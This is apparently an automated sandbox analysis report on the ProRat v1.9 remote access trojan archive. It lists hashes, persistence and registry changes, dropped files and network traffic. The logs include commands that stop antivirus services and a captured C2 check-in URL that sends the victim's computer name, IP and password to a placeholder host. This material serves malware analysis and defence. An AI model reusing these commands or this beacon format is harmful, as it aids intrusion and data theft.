| File name: | prorat_v1.9.zip |
| Full analysis: | https://app.any.run/tasks/57dcd8ea-905d-4fa3-8ae8-13a5e26620d7 |
| Verdict: | Malicious activity |
| Threats: | Ransomware is a type of malicious software that locks users out of their system or data using different methods to force them to pay a ransom. Most often, such programs encrypt files on an infected machine and demand a fee to be paid in exchange for the decryption key. Additionally, such programs can be used to steal sensitive information from the compromised computer and even conduct DDoS attacks against affected organizations to pressure them into paying. |
| Analysis date: | March 09, 2024, 03:41:32 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v2.0 to extract, compression method=deflate |
| MD5: | 58BBA5A6C8CB5654A586C361886C739B |
| SHA1: | 193D2D37F9FE22A8D1DC618F31C4C843518C33EF |
| SHA256: | 092106302A786B6A726503C027A8AA8E68DF31D4E81DCE380033E45A04DD1E9B |
| SSDEEP: | 49152:HLAGwQd7SqIuaicE3H4EzGLFaoJs1n6nLRHcDItp33mo/lIq96tehDHWSm:HLp9dh+EzH1n6FcDIT32wlhcY2/ |
MALICIOUS
Drops the executable file immediately after the start
- ProRat.exe (PID: 2444)
- upx.exe (PID: 3964)
- server.exe (PID: 3516)
- fservice.exe (PID: 1740)
- services.exe (PID: 3684)
Creates a writable file in the system directory
- server.exe (PID: 3516)
- services.exe (PID: 3684)
Changes the login/logoff helper path in the registry
- server.exe (PID: 3516)
- services.exe (PID: 3684)
Changes the autorun value in the registry
- server.exe (PID: 3516)
- services.exe (PID: 3684)
Starts NET.EXE for service management
- services.exe (PID: 3684)
- net.exe (PID: 3068)
- net.exe (PID: 1560)
Connects to the CnC server
- services.exe (PID: 3684)
SUSPICIOUS
Creates files like ransomware instruction
- WinRAR.exe (PID: 3700)
Executable content was dropped or overwritten
- ProRat.exe (PID: 2444)
- upx.exe (PID: 3964)
- server.exe (PID: 3516)
- fservice.exe (PID: 1740)
- services.exe (PID: 3684)
Starts itself from another location
- server.exe (PID: 3516)
- fservice.exe (PID: 1740)
The process creates files with name similar to system file names
- fservice.exe (PID: 1740)
Creates or modifies Windows services
- services.exe (PID: 3684)
Executing commands from a ".bat" file
- server.exe (PID: 3516)
Starts CMD.EXE for commands execution
- server.exe (PID: 3516)
Connects to SMTP port
- services.exe (PID: 3684)
INFO
Checks supported languages
- ProRat.exe (PID: 2444)
- upx.exe (PID: 3964)
- server.exe (PID: 3516)
- fservice.exe (PID: 1740)
- services.exe (PID: 3684)
Create files in a temporary directory
- ProRat.exe (PID: 2444)
Manual execution by a user
- ProRat.exe (PID: 2444)
- server.exe (PID: 3516)
Executable content was dropped or overwritten
- WinRAR.exe (PID: 3700)
Drops the executable file immediately after the start
- WinRAR.exe (PID: 3700)
Reads the computer name
- services.exe (PID: 3684)
- ProRat.exe (PID: 2444)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .zip | | | ZIP compressed archive (100) |
|---|
EXIF
ZIP
| ZipRequiredVersion: | 20 |
|---|---|
| ZipBitFlag: | 0x000b |
| ZipCompression: | Deflated |
| ZipModifyDate: | 2005:03:23 19:51:08 |
| ZipCRC: | 0x050bd35d |
| ZipCompressedSize: | 2830963 |
| ZipUncompressedSize: | 2968576 |
| ZipFileName: | ProRat.exe |
Total processes
59
Monitored processes
11
Malicious processes
3
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1560 | NET STOP srservice | C:\Windows\System32\net.exe | — | services.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Net Command Exit code: 2 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1572 | C:\Windows\system32\net1 STOP srservice | C:\Windows\System32\net1.exe | — | net.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Net Command Exit code: 2 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1740 | C:\Windows\system32\fservice.exe | C:\Windows\System32\fservice.exe | server.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 1 Modules
| |||||||||||||||
| 2432 | C:\Windows\system32\net1 STOP navapsvc | C:\Windows\System32\net1.exe | — | net.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Net Command Exit code: 2 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2444 | "C:\Users\admin\Desktop\ProRat.exe" | C:\Users\admin\Desktop\ProRat.exe | explorer.exe | ||||||||||||
User: admin Company: P®O Group Integrity Level: HIGH Description: ProHack.Net Remote Administrator Tool Exit code: 0 Version: 1.9.0.0 Modules
| |||||||||||||||
| 2900 | C:\Windows\system32\cmd.exe /c C:\Users\admin\Desktop\server.exe.bat | C:\Windows\System32\cmd.exe | — | server.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 3068 | NET STOP navapsvc | C:\Windows\System32\net.exe | — | services.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Net Command Exit code: 2 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3516 | "C:\Users\admin\Desktop\server.exe" | C:\Users\admin\Desktop\server.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 1 Modules
| |||||||||||||||
| 3684 | C:\Windows\services.exe -XP | C:\Windows\services.exe | fservice.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
| 3700 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\prorat_v1.9.zip" | C:\Program Files\WinRAR\WinRAR.exe | explorer.exe | ||||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.91.0 Modules
| |||||||||||||||
Total events
6 235
Read events
5 556
Write events
679
Delete events
0
Modification events
| (PID) Process: | (3700) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtBMP |
Value: | |||
| (PID) Process: | (3700) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtIcon |
Value: | |||
| (PID) Process: | (3700) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (3700) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 3 |
Value: C:\Users\admin\Desktop\phacker.zip | |||
| (PID) Process: | (3700) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip | |||
| (PID) Process: | (3700) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip | |||
| (PID) Process: | (3700) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\AppData\Local\Temp\prorat_v1.9.zip | |||
| (PID) Process: | (3700) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (3700) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (3700) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
Executable files
9
Suspicious files
2
Text files
23
Unknown types
1
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3700 | WinRAR.exe | C:\Users\admin\Desktop\Language\English.ini | text | |
MD5:A7874DA3C0740649A45C5F4E831A8BDA | SHA256:499DD77BBD4F6A3D52134A3C447AB7CF1457CFF988A5D4B0913F23FB6915A5C8 | |||
| 3700 | WinRAR.exe | C:\Users\admin\Desktop\ProRat.exe | executable | |
MD5:AD6E98662CDDB997FE170826B6A4E5E0 | SHA256:66A9548A3B309282500BC4AAB0583AA8223E6B7A4AEDA84FD3D56F53C31B9302 | |||
| 3700 | WinRAR.exe | C:\Users\admin\Desktop\Turkish.chm | chm | |
MD5:E679751BD3967950BD5C71DA997689E9 | SHA256:AA8116BD88DB2DD18A569B73B5E7C08982082B35FC4D22DB4FEA326282A16869 | |||
| 3700 | WinRAR.exe | C:\Users\admin\Desktop\Language\Malay.ini | text | |
MD5:67AC28D97E2704EAF12D3166A309B339 | SHA256:56DAAF2E5F49077FD5806B4676296DB61C6E1F8546D37D37B946C74B4D1F6B6A | |||
| 3700 | WinRAR.exe | C:\Users\admin\Desktop\Language\Portugues(Brasil).ini | text | |
MD5:B846FA1CC3C73D82FA5030E375E7E3E8 | SHA256:491CF4BACA9C1C33DBFFC7934D2229028BB74F156C905B03ACD464B52169CA60 | |||
| 3700 | WinRAR.exe | C:\Users\admin\Desktop\Language\Arabic.ini | text | |
MD5:0835AAACE390A33194EBB76F5F700655 | SHA256:7B1AFADDE740F55212EF7A78995F6DF5A8F2AA0367B6BFD1EEAB2B0E63DF1F94 | |||
| 3700 | WinRAR.exe | C:\Users\admin\Desktop\Language\Persian.ini | text | |
MD5:FF9C16368BEE90CC98CE620EF8CF02AA | SHA256:5B45EB9553702AC6C32A20BF6C538CB318164F143A8E369BC5D8AA1D15D770FB | |||
| 3700 | WinRAR.exe | C:\Users\admin\Desktop\Language\Estonian.ini | text | |
MD5:5C259A7CDAB7E2CDDBA6E598AD1317B8 | SHA256:B8B203C93D4DA4242A887C28478EDA45F0CA0F2464FD6B820D49C78320E82245 | |||
| 3700 | WinRAR.exe | C:\Users\admin\Desktop\Language\German.ini | text | |
MD5:CDA78D1D40FAD55F71058D90A666D508 | SHA256:EC3C86388E745DABF924383E55D827B49183AAD2003263F8DC93B8184F631D73 | |||
| 3700 | WinRAR.exe | C:\Users\admin\Desktop\Language\Italian.ini | text | |
MD5:1854D92FED9E01625D6AB2BB4EF2A9FB | SHA256:3A21419E7235DA95B1C5372B1C4ABCCECEC90F24F06EF717059F4F2D273865DB | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
8
DNS requests
7
Threats
5
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3684 | services.exe | GET | 301 | 188.114.96.3:80 | http://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=USER_PC&ipadresi=192.168.100.42&serverportu=5110&kurban=victim&servermodeli=V1.9:Fix-10&serversaati=3:43:36_AM&servertarihi=3/9/2024&serversifre=123456&islem=log | unknown | html | 234 b | unknown |
3684 | services.exe | GET | 301 | 5.61.236.229:80 | http://www.icq.com/friendship/email_thank_you.php?folder_id=18984¶ms_count=0&nick_name=Pro_Rat&user_email=Pro_Rat@yahoo.com&user_uin=&friend_nickname=&friend_contact=157116797&friend_nickname2=&friend_contact2=&x=60&y=15 | unknown | html | 178 b | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
— | — | 224.0.0.252:5355 | — | — | — | unknown |
1080 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
3684 | services.exe | 192.168.100.2:53 | — | — | — | whitelisted |
3684 | services.exe | 67.195.204.77:25 | mta6.am0.yahoodns.net | YAHOO-BF1 | US | unknown |
3684 | services.exe | 5.61.236.229:80 | www.icq.com | LLC VK | RU | unknown |
3684 | services.exe | 188.114.96.3:80 | www.yoursite.com | CLOUDFLARENET | NL | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
you.no-ip.com |
| unknown |
www.yoursite.com |
| malicious |
www.icq.com |
| unknown |
yahoo.com |
| unknown |
mta6.am0.yahoodns.net |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
1080 | svchost.exe | Misc activity | ET INFO DYNAMIC_DNS Query to a Suspicious no-ip Domain |
1080 | svchost.exe | Misc activity | ET INFO DYNAMIC_DNS Query to a Suspicious no-ip Domain |
1080 | svchost.exe | Misc activity | ET INFO DYNAMIC_DNS Query to a Suspicious no-ip Domain |
3684 | services.exe | Potential Corporate Privacy Violation | ET POLICY ICP Email Send via HTTP - Often Trojan Install Reports |
1 ETPRO signatures available at the full report
Process | Message |
|---|---|
services.exe | Found |
services.exe | Advapi32.dll |
services.exe | ...
|
services.exe | Found |
services.exe | kernel32.dll |
fservice.exe | Found |
fservice.exe | Advapi32.dll |
fservice.exe | ...
|
fservice.exe | Found |
fservice.exe | kernel32.dll |